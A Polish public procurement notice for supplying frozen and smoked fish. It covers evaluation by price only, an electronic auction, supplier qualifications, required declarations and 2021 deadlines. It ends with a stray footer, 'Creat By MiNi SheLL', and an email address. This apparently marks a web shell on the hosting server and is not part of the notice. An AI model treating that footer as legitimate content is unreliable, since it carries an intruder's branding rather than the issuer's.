pochodzenia zwierzęcego (t.j. Dz.U. z 2020 r., poz. 1753 z późn. zm.). Wykonawca musi podlegać stałemu nadzorowi właściwych władz. <br/>10.	Oferowane produkty muszą spełniać wymagania wymienione w obowiązujących przepisach prawa dotyczącego produkcji i obrotu żywności. Każdy produkt musi być wyprodukowany i wprowadzony do obrotu zgodnie z wymogami systemu HACCP. <br/>11.	Szczegóły realizacji zamówienia określone zostały we wzorze umowy stanowiącym załącznik nr 4 do SWZ.<br/>12.	Wykonawca zapewni ochronę przekazywanych danych osobowych, zgodnie z ustawą z dnia 10 maja 2018 r. o ochronie danych osobowych (t.j. Dz.U. z 2019 r. poz. 1781) i Rozporządzeniem Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych (dalej RODO) (t.j. Dz.U. UE L 2016 r. nr. 119 s. 1). Obowiązek poinformowania Podwykonawców, podmiotów trzecich i członków konsorcjum o przetwarzaniu danych osobowych spoczywa na Wykonawcy. Oświadczenie Wykonawcy o wypełnieniu obowiązków wynikających z art. 13 lub art. 14 RODO wobec osób fizycznych, od których dane osobowe bezpośrednio lub pośrednio pozyskał w celu ubiegania się o niniejsze zamówienie złożone zostanie w formularzu ofertowym – stanowiącym załącznik nr 1 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15220000-6 - Ryby mrożone, filety rybne i pozostałe mięso ryb</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15234000-7 - Ryby wędzone</p> <p class="mb-0">15241200-1 - Śledź przetworzony lub konserwowany</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.12.) Opis wznowienia</h3> Zamawiający przewiduje możliwość wznowienia zamówienia, polegającą na powtórzeniu przedmiotu zamówienia na okres kolejnych 3 miesięcy. W przypadku skorzystania przez Zamawiającego ze wznowienia zamówienia, Zamawiający poinformuje o tym pisemnie Wykonawcę, w terminie do 14 dni przed zakończeniem umowy. W przypadku niepoinformowania Wykonawcy o skorzystaniu przez Zamawiającego ze wznowienia zamówienia w terminie o którym mowa wyżej należy uznać, że Zamawiający nie będzie korzystał<br/>ze wznowienia. Wykonawcy nie będzie miał żadnych roszczeń w stosunku do Zamawiającego, w przypadku gdy Zamawiający ze wznowienia nie skorzysta. <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1)	Jedynym kryterium oceny ofert będzie cena.<br/>Cena =100%<br/>2)	Cena ofertowa brutto zamówienia – 100 pkt (UWAGA – kryterium podlegać będzie ocenie w toku aukcji elektronicznej):<br/>C - Ilość punktów =	najniższa oferowana cena oferty brutto<br/>z ważnych ofert/	cena brutto badanej oferty x 100 pkt<br/>2)	Wyznaczenie wartości punktów:<br/>a)	oferta z najniższą ceną z uwzględnieniem wyników aukcji elektronicznej otrzyma maksymalną liczbę punktów tj. 100 pkt,<br/>b)	inne oferty cenowe zostaną przeliczone wg powyższego wzoru,<br/>c)	jeżeli oferty cenowe po przeliczeniu wg powyższego wzoru będą sobie równe otrzymają taką samą liczbę pkt.<br/>2.	Zamawiający udzieli zamówienia Wykonawcy, który spełnia warunki udziału w postępowaniu, nie podlega wykluczeniu z postępowania (zgodnie z Rozdziałem VII i VIII niniejszej SWZ), oferta jego nie podlega odrzuceniu oraz który zaoferuje najniższą cenę za realizacje przedmiotu zamówienia<br/>3.	Oceny ofert dokona komisja przetargowa.<br/>4.	Po dokonaniu oceny ofert, Zamawiający zamierza przeprowadzić aukcję elektroniczną zgodnie z art. 308 ustawy Pzp.<br/>5.	Zamawiający przeprowadzi aukcję elektroniczną, jeżeli zostaną złożone co najmniej dwie oferty niepodlegające odrzuceniu.<br/>6.	Jeśli nie zostaną złożone co najmniej dwie oferty niepodlegające odrzuceniu, aukcja elektroniczna nie zostanie przeprowadzona, a oferta najkorzystniejsza zostanie wybrana spośród ofert, złożonych w odpowiedzi na ogłoszenie o zamówieniu.<br/>7.	W sytuacji, gdy dwie lub więcej oferty uzyskają jednakową maksymalną liczbę punktów w toku aukcji elektronicznej, Zamawiający wezwie Wykonawców do złożenia ofert dodatkowych w formie pisemnej.<br/>8.	Jeżeli w toku aukcji nie zostanie złożone żadne postąpienie, Zamawiający dokona wyboru najkorzystniejszej oferty spośród ofert pisemnych złożonych w odpowiedzi na ogłoszenie o zamówieniu.<br/>9.	Do obliczenia wartości punktowej złożonej oferty, w zakresie kryterium ceny w toku aukcji elektronicznej przyjmuje się następujący sposób obliczenia ceny przy spełnieniu poniższych warunków:<br/>1)	złożone zostały co najmniej dwie oferty;<br/>2)	została ustalona waga kryterium – wartość maksymalnej liczby punktów, jaka może być przyznana w ramach kryterium ceny.<br/>10.	Za ofertę najwyżej ocenioną zostanie uznana oferta, spośród złożonych, ważnych i niepodlegających odrzuceniu ofert, która uzyska największą ilość punktów na podstawie kryterium ceny.<br/>UWAGA<br/>W aukcji elektronicznej minimalne postąpienie w tym kryterium to 500 zł brutto.<br/>Licytowana cena będzie ceną brutto za realizację całego zamówienia.<br/><br/>UWAGA<br/>Jeżeli zostanie złożona oferta, której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z ustawą z dnia 11 marca 2004 r. o podatku od towarów i usług (t.j. Dz.U. z 2021 r. poz. 685, z późn.zm.), dla celów zastosowania kryterium ceny Zamawiający dolicza do przedstawionej w tej ofercie ceny kwotę podatku od towarów i usług, którą miałby obowiązek rozliczyć.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki udziału w postępowaniu dotyczące:<br/>A. DLA CZĘŚĆI 1:<br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia w tym zakresie żadnego warunku.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej <br/>o ile wynika to z odrębnych przepisów:<br/>Wykonawca spełni warunek jeżeli wykaże, że:<br/>a)	posiada uprawnienia do prowadzenia określonej działalności zawodowej <br/>na podstawie ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (t.j. Dz.U. z 2020 poz. 2021, z późn. zm.) lub ustawy z dnia 16 grudnia 2005 r. <br/>o produktach pochodzenia zwierzęcego (tj. Dz.U. z 2020 r. poz. 1753) w szczególności Wykonawca musi podlegać stałemu nadzorowi właściwych władz.<br/>3)	sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia w tym zakresie żadnego warunku.<br/>4)	zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek jeżeli wykaże, że:<br/>a)	wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej jedno zamówienie (dostawę) obejmującą swym zakresem dostawy artykułów żywnościowych w postaci produktów mrożonych o wartości co najmniej 20.000,00 zł brutto (słownie: dwadzieścia tysięcy złotych 00/100);<br/>b)	dysponuje co najmniej jednym środkiem transportu spełniającym warunki określone w rozdziale IV Załącznika nr II do rozporządzenia (WE) nr 852/2004 Parlamentu Europejskiego i Rady z dnia 29 kwietnia 2004 r. w sprawie higieny środków spożywczych (Dz. U. UE. L. z 30 kwietnia 2004 r. nr 139.1);<br/>B. DLA CZĘŚĆI 2:<br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia w tym zakresie żadnego warunku.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej <br/>o ile wynika to z odrębnych przepisów:<br/>Wykonawca spełni warunek jeżeli wykaże, że:<br/>a)	posiada uprawnienia do prowadzenia określonej działalności zawodowej <br/>na podstawie ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (t.j. Dz.U. z 2020 poz. 2021, z późn. zm.) lub ustawy z dnia 16 grudnia 2005 r. <br/>o produktach pochodzenia zwierzęcego (tj. Dz.U. z 2020 r. poz. 1753)<br/> w szczególności Wykonawca musi podlegać stałemu nadzorowi właściwych władz.<br/>3)	sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia w tym zakresie żadnego warunku.<br/>4)	zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek jeżeli wykaże, że:<br/>a)	wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej jedno zamówienie (dostawę) obejmującą swym zakresem dostawy artykułów żywnościowych w postaci produktów rybnych o wartości co najmniej 15.000,00 zł brutto (słownie: piętnaście tysięcy złotych 00/100);<br/>b)	dysponuje co najmniej jednym środkiem transportu spełniającym warunki określone w rozdziale IV Załącznika nr II do rozporządzenia (WE) nr 852/2004 Parlamentu Europejskiego i Rady z dnia 29 kwietnia 2004 r. w sprawie higieny środków spożywczych (Dz. U. UE. L. z 30 kwietnia 2004 r. nr 139.1); <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Przed udzieleniem zamówienia Zamawiający wezwie Wykonawcę (DOKUMENTÓW NIE DOŁĄCZA SIĘ DO OFERTY), którego ofertę najwyżej ocenił, do złożenia w wyznaczonym terminie (nie krótszym niż 5 dni), aktualnych na dzień ich złożenia Podmiotowych środków dowodowych w celu wskazania braku podstaw wykluczenia z postępowania:<br/>1)	odpisu lub informacji z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust. 1 pkt 4 ustawy Pzp;<br/>2)	oświadczenia Wykonawcy o braku orzeczenia wobec niego zakazu ubiegania się o zamówienie publiczne;<br/>3)	oświadczenia Wykonawcy o braku wydania wobec niego prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo – w przypadku wydania takiego wyroku lub decyzji – dokumentów potwierdzających dokonanie płatności tych należności wraz z ewentualnymi odsetkami lub grzywnami lub zawarcia wiążącego porozumienia w sprawie spłat tych należności;<br/>4)	oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j. Dz.U. z 2021 r., poz. 275) z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Przed udzieleniem zamówienia Zamawiający wezwie Wykonawcę (DOKUMENTÓW NIE DOŁĄCZA SIĘ DO OFERTY), którego ofertę najwyżej ocenił, do złożenia w wyznaczonym terminie (nie krótszym niż 5 dni), aktualnych na dzień ich złożenia Podmiotowych środków dowodowych w celu wskazania spełnienia warunków udziału w postępowaniu: <br/>1)	aktualnego zaświadczenia o wpisie do rejestru zakładów podlegających urzędowej kontroli organów Państwowej Powiatowej Inspekcji Sanitarnej – zgodnie z ustawą z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (t.j. Dz.U. z 2020 r., poz. 2021, z późn. zm.) - wzór zaświadczenia określa załącznik nr 6 do Rozporządzenie Ministra Zdrowia z dnia 29 maja 2007 r. w sprawie wzorów dokumentów dotyczących rejestracji i zatwierdzania zakładów produkujących lub wprowadzających do obrotu żywność podlegających urzędowej kontroli Państwowego Powiatowego Inspektora Sanitarnego (Dz.U. z 2007 r. nr 106 poz. 730) lub aktualnej decyzji administracyjnej o wpisie do rejestru zakładów albo o zatwierdzeniu zakładu wydanej przez powiatowego lekarza weterynarii wraz z nadanym numerem identyfikacyjnym zgodnie z art. 21 ust. 4 ustawy z dnia 16 grudnia 2005 r. o produktach pochodzenia zwierzęcego (t.j. Dz.U. z 2020 r., poz. 1753 z późn. zm.); W przypadku gdy dokumenty zostały wystawione wcześniej niż w okresie ostatnich 36 miesięcy Wykonawca zobowiązany jest dołączyć oświadczenie potwierdzające aktualność powyższych dokumentów.<br/>2)	wykazu dostaw wykonanych nie wcześniej niż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a w przypadku świadczeń okresowych lub ciągłych również wykonanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy były wykonywane, a w przypadku świadczeń okresowych i ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy: w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonanie. Wykaz musi potwierdzać spełnienie warunku udziału w postępowaniu w zakresie określonym w Rozdziale VII ust. 2 pkt 4a SWZ;<br/>3)	wykazu środków transportu, jakimi dysponuje Wykonawca, niezbędnych <br/>do wykonania zamówienia, ze wskazaniem daty wydania decyzji lub kontroli dopuszczającej pojazd do transportu w zakresie przedmiotu zamówienia. Wykaz musi potwierdzać spełnienie warunku udziału w postępowaniu w zakresie określonym w Rozdziale VII ust. 2 pkt 4b SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Wykonawcy zgodnie z art. 106 ustawy Pzp zobowiązani są załączyć do oferty następujące dokumenty (PRZEDMIOTOWE ŚRODKI DOWODOWE):<br/>Karty produktów, lub inne dokumenty, z których będzie wynikał ich skład oraz spełnienie wymagań określonych przez Zamawiającego w Specyfikacji asortymentowo-ilościowo-wartościowej stanowiącej załącznik nr 1A i 1B do SWZ.<br/>UWAGA!<br/>Jeżeli Wykonawca nie złoży przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe będą niekompletne, Zamawiający wezwie do ich złożenia lub uzupełnienia w wyznaczonym przez siebie terminie.<br/>W przypadku gdy przedmiotowe środki dowodowe zawierają błędy, zgodnie z art. 107 ust. 2 ustawy Pzp nie podlegają uzupełnieniu, zatem oferta Wykonawcy zostanie odrzucona na podstawie art. 226 ust. 1 pkt 2 lit. c, tj. Zamawiający odrzuca ofertę jeżeli została złożona przez wykonawcę, który nie złożył w przewidzianym terminie oświadczenia, o którym mowa w art. 125 ust. 1, lub podmiotowego środka dowodowego, potwierdzających brak podstaw wykluczenia lub spełnianie warunków udziału w postępowaniu, przedmiotowego środka dowodowego, lub innych dokumentów lub oświadczeń. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Karty produktów, lub inne dokumenty, z których będzie wynikał ich skład oraz spełnienie wymagań określonych przez Zamawiającego w Specyfikacji asortymentowo-ilościowo-wartościowej stanowiącej załącznik nr 1A i 1B do SWZ. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawcy zobowiązani są załączyć do oferty następujące dokumenty:<br/>1)	Formularz ofertowy wypełniony zgodnie z załącznikiem nr 1 do SWZ.<br/>2)	Specyfikację asortymentowo-ilościowo-wartościową wypełnioną zgodnie z załącznikiem nr 1A do SWZ dla części 1 zamówienia lub Specyfikację asortymentowo-ilościowo-wartościową wypełnioną zgodnie z załącznikiem nr 1B do SWZ dla części 2 zamówienia <br/>3)	Karty produktów lub inne dokumenty które będą potwierdzały, <br/>że asortyment proponowany przez Wykonawcę spełnia wymagania określone przez Zamawiającego w specyfikacji asortymentowo-ilościowo-wartościowej stanowiącej załącznik 1A dla części 1 lub 1B do SWZ dla części 2<br/>4)	Oświadczenia wymagane na podstawie art. 125 ust. 1 pkt 1 ustawy Pzp, złożone na formularzu stanowiącym załącznik nr 2 do SWZ oraz aktualne na dzień składania ofert.<br/>5)	Oświadczenie Wykonawcy czy zamierza zlecić Podwykonawcy/com wykonanie zamówienia. <br/>6)	Oświadczenie Wykonawcy, czy będzie się powoływał na zasoby innych podmiotów na zasadach określonych w art. 118 ustawy Pzp, w celu wykazania spełniania warunków udziału w postępowaniu. <br/>7)	Oświadczenie Wykonawcy czy wybór oferty będzie prowadzić do powstania u Zamawiającego obowiązku podatkowego. <br/>8)	Oświadczenie Wykonawcy, że cena została obliczona zgodnie z Rozdziałem XVII SWZ i zawiera wszystkie koszty związane z realizacją przedmiotu zamówienia.<br/>9)	Oświadczenie Wykonawcy, że zapoznał się z SWZ i treścią wzoru umowy i przyjmuje je bez zastrzeżeń oraz zobowiązuje się w przypadku wyboru jego oferty do zawarcia umowy na wyżej wymienionych warunkach w miejscu i terminie wyznaczonym przez Zamawiającego. <br/>10)	Oświadczenie Wykonawcy, że zdobył konieczne informacje niezbędne do właściwego przygotowania oferty. <br/>11)	Oświadczenie Wykonawcy, że wykona zamówienie w terminie wskazanym w SWZ, zgodnie z wymogami i warunkami Zamawiającego określonymi w SWZ oraz we wzorze umowy.<br/>12)	Oświadczenie Wykonawcy, że w ofercie nie została zastosowana cena dumpingowa i oferta nie została złożona w warunkach czynu nieuczciwej konkurencji zgodnie z art. 226 ust. 1 pkt 7 ustawy Pzp oraz zgodnie z art. ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji. (t.j. Dz.U. z 2020 r. poz. 1913 z późn. zm.).<br/>13)	Oświadczenie, że Wykonawca uważa się związany ofertą na czas wskazany w SWZ.<br/>14)	Oświadczenie Wykonawcy, o statusie małego lub średniego przedsiębiorstwa zgodnie z definicją zawartą w art. 7 ustawy a 2 marca 2018 r. Prawo przedsiębiorców (Dz.U. z 2021 r., poz. 162).<br/>15)	Oświadczenie Wykonawcy, że w ofercie zawarte są informacje stanowiące tajemnicę przedsiębiorstwa.<br/>16)	Oświadczenie Wykonawcy o wyrażeniu zgody na udostępnianie danych osobowych zawartych w ofercie.<br/>17)	Oświadczenie Wykonawcy, że realizując zamówienie Wykonawca będzie stosować przepisy rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych, Dz.U. UE L 2016 r. <br/>nr. 119 s. 1 – „RODO”).<br/>18)	Oświadczenie Wykonawcy, że wypełnił obowiązki informacyjne przewidziane w art. 13 lub art. 14 RODO wobec osób fizycznych, od których dane osobowe bezpośrednio <br/>lub pośrednio pozyskał w celu ubiegania się o udzielenie zamówienia publicznego w niniejszym postępowaniu.<br/>19)	Informacje potrzebne do przeprowadzenia aukcji elektronicznej.<br/>20)	Wykaz załączników dołączonych do oferty. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.3.1.) Adres internetowy aukcji: <span class="normal">https://aukcje.uzp.gov.pl.</span></h3> <h3 class="mb-0">6.3.2.) Opis aukcji elektronicznej: </h3> Zamawiający przewiduje aukcję elektroniczną dla części 1 oraz dla części 2<br/>Szczegóły dotyczące aukcji elektronicznej opisane są w rozdziale XIX SWZ.<br/>W aukcji elektronicznej minimalne postąpienie w tym kryterium to 500 zł brutto.<br/>Licytowana cena będzie ceną brutto za realizację całego zamówienia.<br/>Zamawiający przeprowadzi aukcję elektroniczną, jeżeli zostaną złożone co najmniej dwie oferty <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia na zasadach określonych <br/>w art. 117 ustawy Pzp.<br/>2.	Oświadczenia o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw <br/>do wykluczenia z postępowania o których mowa w rozdziale IX.A ust. 1 SWZ składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika <br/>do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania <br/>w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo powinno być dołączone do oferty.<br/>4.	Oferta musi być podpisana przez wszystkie podmioty tworzące konsorcjum lub ustanowionego pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia;<br/>5.	Jeśli każdy z Wykonawców wspólnie ubiegających się o zamówienie będzie wykonywać część zamówienia, do którego przepisy wymagają posiadania uprawnień czy też Zamawiający opisał sposób oceny spełnienia warunków udziału w postępowaniu w zakresie wiedzy i doświadczenia to każdy z nich musi wykazać, iż posiada uprawnienia i posiada wiedzę i doświadczenie dotyczące części zamówienia przewidzianego Wykonawcy <br/>do wykonania. <br/>6.	W przypadku zaistnienia okoliczności o których mowa w ust. 5, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie z którego wynika, które dostawy będą realizowane przez poszczególnych wykonawców.<br/>7.	Wykonawcy wspólnie ubiegający się o zamówienie:<br/>1)	ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania;<br/>2)	w przypadku ustanowienia pełnomocnika przyjmuje się, że pełnomocnictwo <br/>do podpisania oferty obejmuje pełnomocnictwo do poświadczenia za zgodność <br/>z oryginałem wszystkich dokumentów;<br/>3)	pełnomocnictwo musi wynikać z umowy lub z innej czynności prawnej, mieć formę pisemną; wszelka korespondencja prowadzona będzie z pełnomocnikiem;<br/>4)	jeżeli oferta konsorcjum zostanie wybrana jako najkorzystniejsza, Zamawiający może przed zawarciem umowy wezwać pełnomocnika do przedstawienia umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Istotne dla Stron postanowienia określa wzór umowy stanowiący załącznik nr 4 do SWZ. <br/>2. Umowa zostanie uzupełniona o zapisy wynikające ze złożonej oferty.<br/>3. Zamawiający przewiduje możliwość zmiany umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w zakresie uregulowanym w art. 454-455 ustawy Pzp. oraz w zakresie w jakim zostały przewidziane w postaci jednoznacznych postanowień umownych<br/>zgodnie ze wzorem umowy.<br/>4. Zmiana umowy wymaga dla swej ważności zachowania formy pisemnej.<br/>5. ZAMAWIAJĄCY dopuszcza możliwość zmiany asortymentu wymienionego w załącznikach do umowy, o których mowa w § 1 ust. 1, na pisemny uzasadniony wniosek WYKONAWCY, pod warunkiem zaoferowania produktów równoważnych, nie gorszych jakościowo od dotychczas<br/>dostarczanych produktów, przy jednoczesnym zachowaniu dotychczasowych lub niższych cen jednostkowych.<br/>6. Zmiana dostarczanego asortymentu może nastąpić w przypadku:<br/>1) zakończenia produkcji danej pozycji asortymentowej;<br/>2) zmiany gramatury danej pozycji asortymentowej przez producenta produktu;<br/>3) niedostępności produktu na rynku powyżej 14 dni;<br/>4) zmiany producenta w przypadku, gdy WYKONAWCA nie jest jednocześnie producentem dostarczanych produktów, która będzie spowodowana przez:<br/>a) zakończenie lub zawieszenie prowadzonej przez producenta działalności gospodarczej;<br/>b) zerwaniem współpracy pomiędzy WYKONAWCĄ a producentem, za które nie ponosi odpowiedzialności WYKONAWCA.<br/>7. Ceny jednostkowe dostarczanych towarów w trakcie obowiązywania umowy mogą ulec zmianie wyłącznie na podstawie stosownego aneksu do umowy.<br/>8. Zmiana ceny nie może być większa niż „wskaźnik wzrostu cen towarów i usług konsumpcyjnych” za miesiąc poprzedni, określony w Obwieszczeniu Prezesa Głównego Urzędu Statystycznego, opublikowany w Monitorze Polskim jednostkowe dostarczanych towarów.<br/>9. Zmiana ceny, o której mowa w ust. 1 nastąpić może wyłącznie na podstawie uzasadnionego pisemnego wniosku WYKONAWCY, zawierającego szczegółowe zestawienie asortymentu, którego ceny jednostkowe wnioskuje się zmienić z podaniem cen jednostkowych brutto po ich podwyższeniu.<br/>10. Strony dopuszczają możliwość zmiany cen w przypadku zmian stawki podatku VAT, wprowadzonych na podstawie przepisów prawa. W takim przypadku WYKONAWCA poinformuje ZAMAWIAJĄCEGO o ich wystąpieniu na piśmie, przed wprowadzeniem nowych cen.<br/>11. ZAMAWIAJACY zastrzega sobie możliwość wydłużenia okresu realizacji dostaw po terminie, określonym w ust. 1, do czasu wyczerpania środków finansowych, o których mowa w § 7 ust. 4 (maksymalnie o dodatkowe 3 miesiące). W takim przypadku ZAMAWIAJACY poinformuje pisemnie WYKONAWCĘ o potrzebie kontynuacji dostaw na warunkach określonych w niniejszej umowie, z co najmniej 14 dniowym wyprzedzeniem. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-23 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/sp_katowice/proceedings</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-23 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-22</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> TERMIN WYKONANIA ZAMÓWIENIA<br/>DLA CZĘŚCI 1 ORAZ CZĘŚCI 2:<br/>1. Zamówienie realizowane będzie sukcesywnie w okresie 3 miesięcy od dnia podpisania umowy, z zastrzeżeniem że jeżeli umowa zostanie podpisana w 2021 r., bieg terminu wykonania zamówienia rozpoczyna się z dniem 1 stycznia 2022r.<br/>2. Zamawiający zastrzega możliwość przedłużenia terminu realizacji umowy maksymalnie o dodatkowe 3 miesiące w przypadku, gdy w przewidzianym w ust. 1 terminie nie zostaną wyczerpane środki wynikające z zawartej umowy.<br/>3. W przypadku skorzystania ze wznowienia Zamawiający przewiduje wydłużenie tego terminu o kolejne 3 miesiące<br/>4. Szczegółowe zagadnienia dotyczące terminu realizacji umowy uregulowane są we wzorze umowy stanowiącej Załącznik nr 4 do SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com